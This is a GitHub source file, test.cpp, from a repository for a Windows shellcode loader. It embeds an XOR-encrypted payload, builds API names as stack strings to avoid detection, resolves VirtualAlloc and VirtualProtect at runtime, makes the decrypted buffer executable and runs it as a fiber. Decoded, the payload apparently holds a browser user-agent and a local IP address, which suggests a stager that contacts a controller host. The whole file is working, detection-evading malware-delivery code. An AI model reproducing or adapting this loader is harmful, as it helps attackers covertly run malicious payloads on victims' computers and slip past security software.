CRT-Remove-With-Fiber-Execute-Shellcode-Loader/test.cpp at main · Answerr/CRT-Remove-With-Fiber-Execute-Shellcode-Loader · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#include <windows.h>
#pragma comment(linker, "/SUBSYSTEM:WINDOWS /ENTRY:mainCRTStartup")
// --- GLOBAL SHELLCODE BUFFER ---
unsigned char encryptedShellcode[] = {
    // This is the shellcode you provided, encrypted with key 0x5A.
    0xa6, 0x12, 0xd9, 0xbe, 0xaa, 0xb2, 0x92, 0x5a, 0x5a, 0x5a, 0x1b, 0x0b, 0x1b, 0x0a, 0x08, 0x0b,
    0x0c, 0x12, 0x6b, 0x88, 0x3f, 0x12, 0xd1, 0x08, 0x3a, 0x12, 0xd1, 0x08, 0x42, 0x12, 0xd1, 0x08,
    0x7a, 0x12, 0xd1, 0x28, 0x0a, 0x12, 0x55, 0xed, 0x10, 0x10, 0x17, 0x6b, 0x93, 0x12, 0x6b, 0x9a,
    0xf6, 0x66, 0x3b, 0x26, 0x58, 0x76, 0x7a, 0x1b, 0x9b, 0x93, 0x57, 0x1b, 0x5b, 0x9b, 0xb8, 0xb7,
    0x08, 0x1b, 0x0b, 0x12, 0xd1, 0x08, 0x7a, 0xd1, 0x18, 0x66, 0x12, 0x5b, 0x8a, 0x3c, 0xdb, 0x22,
    0x42, 0x51, 0x58, 0x2f, 0x28, 0xd1, 0xda, 0xd2, 0x5a, 0x5a, 0x5a, 0x12, 0xdf, 0x9a, 0x2e, 0x3d,
    0x12, 0x5b, 0x8a, 0x0a, 0xd1, 0x12, 0x42, 0x1e, 0xd1, 0x1a, 0x7a, 0x13, 0x5b, 0x8a, 0xb9, 0x0c,
    0x12, 0xa5, 0x93, 0x1b, 0xd1, 0x6e, 0xd2, 0x12, 0x5b, 0x8c, 0x17, 0x6b, 0x93, 0x12, 0x6b, 0x9a,
    0xf6, 0x1b, 0x9b, 0x93, 0x57, 0x1b, 0x5b, 0x9b, 0x62, 0xba, 0x2f, 0xab, 0x16, 0x59, 0x16, 0x7e,
    0x52, 0x1f, 0x63, 0x8b, 0x2f, 0x82, 0x02, 0x1e, 0xd1, 0x1a, 0x7e, 0x13, 0x5b, 0x8a, 0x3c, 0x1b,
    0xd1, 0x56, 0x12, 0x1e, 0xd1, 0x1a, 0x46, 0x13, 0x5b, 0x8a, 0x1b, 0xd1, 0x5e, 0xd2, 0x12, 0x5b,
    0x8a, 0x1b, 0x02, 0x1b, 0x02, 0x04, 0x03, 0x00, 0x1b, 0x02, 0x1b, 0x03, 0x1b, 0x00, 0x12, 0xd9,
    0xb6, 0x7a, 0x1b, 0x08, 0xa5, 0xba, 0x02, 0x1b, 0x03, 0x00, 0x12, 0xd1, 0x48, 0xb3, 0x15, 0xa5,
    0xa5, 0xa5, 0x07, 0x30, 0x5a, 0x13, 0xe4, 0x2d, 0x33, 0x34, 0x33, 0x34, 0x3f, 0x2e, 0x5a, 0x1b,
    0x0c, 0x13, 0xd3, 0xbc, 0x16, 0xd3, 0xab, 0x1b, 0xe0, 0x16, 0x2d, 0x7c, 0x5d, 0xa5, 0x8f, 0x12,
    0x6b, 0x93, 0x12, 0x6b, 0x88, 0x17, 0x6b, 0x9a, 0x17, 0x6b, 0x93, 0x1b, 0x0a, 0x1b, 0x0a, 0x1b,
    0xe0, 0x60, 0x0c, 0x23, 0xfd, 0xa5, 0x8f, 0xb1, 0x29, 0x00, 0x12, 0xd3, 0x9b, 0x1b, 0xe2, 0x0a,
    0x5a, 0x5a, 0x5a, 0x17, 0x6b, 0x93, 0x1b, 0x0b, 0x1b, 0x0b, 0x30, 0x59, 0x1b, 0x0b, 0x1b, 0xe0,
    0x0d, 0xd3, 0xc5, 0x9c, 0xa5, 0x8f, 0xb1, 0x03, 0x01, 0x12, 0xd3, 0x9b, 0x12, 0x6b, 0x88, 0x13,
    0xd3, 0x82, 0x17, 0x6b, 0x93, 0x08, 0x32, 0x5a, 0x58, 0x1a, 0xde, 0x08, 0x08, 0x1b, 0xe0, 0xb1,
    0x0f, 0x74, 0x61, 0xa5, 0x8f, 0x12, 0xd3, 0x9c, 0x12, 0xd9, 0x99, 0x0a, 0x30, 0x50, 0x05, 0x12,
    0xd3, 0xab, 0x12, 0xd3, 0x80, 0x13, 0x9d, 0x9a, 0xa5, 0xa5, 0xa5, 0xa5, 0x17, 0x6b, 0x93, 0x08,
    0x08, 0x1b, 0xe0, 0x77, 0x5c, 0x42, 0x21, 0xa5, 0x8f, 0xdf, 0x9a, 0x55, 0xdf, 0xc7, 0x5b, 0x5a,
    0x5a, 0x12, 0xa5, 0x95, 0x55, 0xde, 0xd6, 0x5b, 0x5a, 0x5a, 0xb1, 0x89, 0xb3, 0xbe, 0x5b, 0x5a,
    0x5a, 0xb2, 0xf8, 0xa5, 0xa5, 0xa5, 0x75, 0x2f, 0x08, 0x0e, 0x18, 0x5a, 0x87, 0xe3, 0xa1, 0xa1,
    0x9a, 0xee, 0x20, 0x64, 0x5a, 0xae, 0x3b, 0xa9, 0xc6, 0x18, 0x81, 0x2a, 0xf2, 0x52, 0xf1, 0xc3,
    0xfa, 0x78, 0x70, 0xab, 0x03, 0xf4, 0x81, 0xdc, 0x5c, 0xf8, 0x8d, 0xdc, 0x15, 0x25, 0x14, 0xed,
    0x16, 0x03, 0x64, 0x00, 0x00, 0x07, 0xe1, 0x97, 0x7a, 0xaf, 0x8e, 0x84, 0x69, 0x94, 0x71, 0xb5,
    0xf9, 0x64, 0xcb, 0x9e, 0x46, 0xe2, 0xf5, 0x3b, 0x3f, 0x5d, 0x3d, 0xd8, 0x9e, 0x15, 0xff, 0x0c,
    0x86, 0x3f, 0x27, 0x23, 0x88, 0x5a, 0x0f, 0x29, 0x3f, 0x28, 0x77, 0x1b, 0x3d, 0x3f, 0x34, 0x2e,
    0x60, 0x7a, 0x17, 0x35, 0x20, 0x33, 0x36, 0x36, 0x3b, 0x75, 0x6f, 0x74, 0x6a, 0x7a, 0x72, 0x39,
    0x35, 0x37, 0x2a, 0x3b, 0x2e, 0x33, 0x38, 0x36, 0x3f, 0x61, 0x7a, 0x17, 0x09, 0x13, 0x1f, 0x7a,
    0x63, 0x74, 0x6a, 0x61, 0x7a, 0x0d, 0x33, 0x34, 0x3e, 0x35, 0x2d, 0x29, 0x7a, 0x14, 0x0e, 0x7a,
    0x6c, 0x74, 0x6b, 0x61, 0x7a, 0x0d, 0x15, 0x0d, 0x6c, 0x6e, 0x61, 0x7a, 0x0e, 0x28, 0x33, 0x3e,
    0x3f, 0x34, 0x2e, 0x75, 0x6f, 0x74, 0x6a, 0x61, 0x7a, 0x17, 0x1b, 0x09, 0x0a, 0x73, 0x57, 0x50,
    0x5a, 0xa4, 0x7a, 0x4d, 0x06, 0x44, 0x9b, 0x9e, 0x39, 0xae, 0xd9, 0x9f, 0x10, 0xcf, 0xb6, 0xb4,
    0xb1, 0x2d, 0x83, 0x4a, 0xb5, 0x8c, 0xf0, 0x66, 0xf4, 0x1b, 0xb9, 0xc4, 0x37, 0x1d, 0x25, 0x3a,
    0x87, 0x4f, 0x30, 0xf0, 0x17, 0xec, 0x67, 0x89, 0xf7, 0xc5, 0xe9, 0x46, 0x96, 0x09, 0x61, 0x59,
    0xee, 0xff, 0xab, 0x23, 0x31, 0x7e, 0xf9, 0xfc, 0xff, 0x43, 0x80, 0x9c, 0xeb, 0x72, 0x73, 0xc0,
    0xc3, 0x0c, 0xa6, 0x51, 0x3e, 0xf7, 0x88, 0x9b, 0x68, 0xd8, 0x70, 0xd6, 0x97, 0x01, 0x54, 0x5d,
    0xf4, 0x24, 0xec, 0x7d, 0x45, 0x38, 0x78, 0x0f, 0xe4, 0x42, 0xe0, 0x57, 0xda, 0x5e, 0x19, 0x48,
    0xc1, 0x2f, 0x68, 0x9b, 0xc3, 0xa0, 0x28, 0xcc, 0xe2, 0x89, 0xf3, 0x63, 0x55, 0xcb, 0x95, 0xd9,
    0xc0, 0xd9, 0x35, 0xf4, 0xe7, 0x14, 0x84, 0x81, 0x9a, 0x32, 0x58, 0xa6, 0xc2, 0x3f, 0x90, 0x82,
    0x9e, 0xf2, 0xa2, 0x41, 0xac, 0x79, 0xa7, 0xe9, 0x9a, 0x86, 0xf9, 0x96, 0x61, 0xd7, 0xf1, 0xe9,
    0xe7, 0x2b, 0x2d, 0x2c, 0x71, 0xc7, 0x2a, 0x80, 0x58, 0xb8, 0xf9, 0x77, 0x25, 0xee, 0x17, 0xe8,
    0xf5, 0x84, 0x12, 0xee, 0x7a, 0xcd, 0x54, 0xda, 0x11, 0xf2, 0x16, 0x1b, 0x75, 0xb8, 0x59, 0x32,
    0xb1, 0x86, 0x8a, 0x18, 0x43, 0x05, 0xfd, 0xa8, 0x29, 0xdc, 0x28, 0xf4, 0x35, 0x00, 0x17, 0x31,
    0x26, 0x5c, 0x8a, 0x0d, 0x55, 0x3d, 0xae, 0xae, 0xe8, 0xd6, 0xa2, 0x1e, 0x4f, 0x20, 0x1d, 0xd1,
    0x7e, 0x20, 0x40, 0xe7, 0x23, 0x5a, 0x1b, 0xe4, 0xaa, 0xef, 0xf8, 0x0c, 0xa5, 0x8f, 0x12, 0x6b,
    0x93, 0xe0, 0x5a, 0x5a, 0x1a, 0x5a, 0x1b, 0xe2, 0x5a, 0x4a, 0x5a, 0x5a, 0x1b, 0xe3, 0x1a, 0x5a,
    0x5a, 0x5a, 0x1b, 0xe0, 0x02, 0xfe, 0x09, 0xbf, 0xa5, 0x8f, 0x12, 0xc9, 0x09, 0x09, 0x12, 0xd3,
    0xbd, 0x12, 0xd3, 0xab, 0x12, 0xd3, 0x80, 0x1b, 0xe2, 0x5a, 0x7a, 0x5a, 0x5a, 0x13, 0xd3, 0xa3,
    0x1b, 0xe0, 0x48, 0xcc, 0xd3, 0xb8, 0xa5, 0x8f, 0x12, 0xd9, 0x9e, 0x7a, 0xdf, 0x9a, 0x2e, 0xec,
    0x3c, 0xd1, 0x5d, 0x12, 0x5b, 0x99, 0xdf, 0x9a, 0x2f, 0x8d, 0x02, 0x02, 0x02, 0x12, 0x5f, 0x5a,
    0x5a, 0x5a, 0x5a, 0x0a, 0x99, 0xb2, 0xc5, 0xa7, 0xa5, 0xa5, 0x6b, 0x63, 0x68, 0x74, 0x6b, 0x6c,
    0x62, 0x74, 0x6b, 0x74, 0x6e, 0x5a, 0x60, 0x84, 0x32, 0xeb
};

// --- Function Pointer Typedefs ---
typedef LPVOID(WINAPI* fnVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
typedef BOOL(WINAPI* fnVirtualProtect)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef LPVOID(WINAPI* fnConvertThreadToFiber)(LPVOID);
typedef LPVOID(WINAPI* fnCreateFiber)(SIZE_T, LPFIBER_START_ROUTINE, LPVOID);
typedef VOID(WINAPI* fnSwitchToFiber)(LPVOID);
typedef VOID(WINAPI* fnExitProcess)(UINT);

// --- Main Logic ---
VOID XorDecrypt(unsigned char* data_in, unsigned char* data_out, size_t size, unsigned char key) {
    for (size_t i = 0; i < size; i++) {
        data_out[i] = data_in[i] ^ key;
    }
}

VOID EntryPoint() {
    // Obfuscate strings on the stack
    char k32_str[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', 0 };
    char va_str[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c', 0 };
    char vp_str[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'P', 'r', 'o', 't', 'e', 'c', 't', 0 };
    char cttf_str[] = { 'C', 'o', 'n', 'v', 'e', 'r', 't', 'T', 'h', 'r', 'e', 'a', 'd', 'T', 'o', 'F', 'i', 'b', 'e', 'r', 0 };
    char cf_str[] = { 'C', 'r', 'e', 'a', 't', 'e', 'F', 'i', 'b', 'e', 'r', 0 };
    char stf_str[] = { 'S', 'w', 'i', 't', 'c', 'h', 'T', 'o', 'F', 'i', 'b', 'e', 'r', 0 };
    char ep_str[] = { 'E', 'x', 'i', 't', 'P', 'r', 'o', 'c', 'e', 's', 's', 0 };

    // Get kernel32.dll module handle
    HMODULE hKernel32 = GetModuleHandleA(k32_str);
    if (!hKernel32) return;

    // Dynamically load function pointers
    fnVirtualAlloc pVirtualAlloc = (fnVirtualAlloc)GetProcAddress(hKernel32, va_str);
    fnVirtualProtect pVirtualProtect = (fnVirtualProtect)GetProcAddress(hKernel32, vp_str);
    fnConvertThreadToFiber pConvertThreadToFiber = (fnConvertThreadToFiber)GetProcAddress(hKernel32, cttf_str);
    fnCreateFiber pCreateFiber = (fnCreateFiber)GetProcAddress(hKernel32, cf_str);
    fnSwitchToFiber pSwitchToFiber = (fnSwitchToFiber)GetProcAddress(hKernel32, stf_str);
    fnExitProcess pExitProcess = (fnExitProcess)GetProcAddress(hKernel32, ep_str);

    if (!pVirtualAlloc || !pVirtualProtect || !pConvertThreadToFiber || !pCreateFiber || !pSwitchToFiber || !pExitProcess) {
        return;
    }

    // Allocate memory for the decrypted shellcode
    LPVOID pShellcodeAddress = pVirtualAlloc(NULL, sizeof(encryptedShellcode), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pShellcodeAddress == NULL) {
        pExitProcess(1);
    }

    // Decrypt the shellcode with the hardcoded key
    XorDecrypt(encryptedShellcode, (unsigned char*)pShellcodeAddress, sizeof(encryptedShellcode), 0x5A);

    // Change memory protection to be executable
    DWORD dwOldProtection = 0;
    if (!pVirtualProtect(pShellcodeAddress, sizeof(encryptedShellcode), PAGE_EXECUTE_READWRITE, &dwOldProtection)) {
        pExitProcess(2);
    }

    // Execute shellcode via Fibers
    LPVOID pPrimaryFiber = pConvertThreadToFiber(NULL);
    if (!pPrimaryFiber) {
        pExitProcess(3);
    }

    LPVOID pShellcodeFiber = pCreateFiber(0, (LPFIBER_START_ROUTINE)pShellcodeAddress, NULL);
    if (!pShellcodeFiber) {
        pExitProcess(4);
    }

    pSwitchToFiber(pShellcodeFiber);

    pExitProcess(0);
}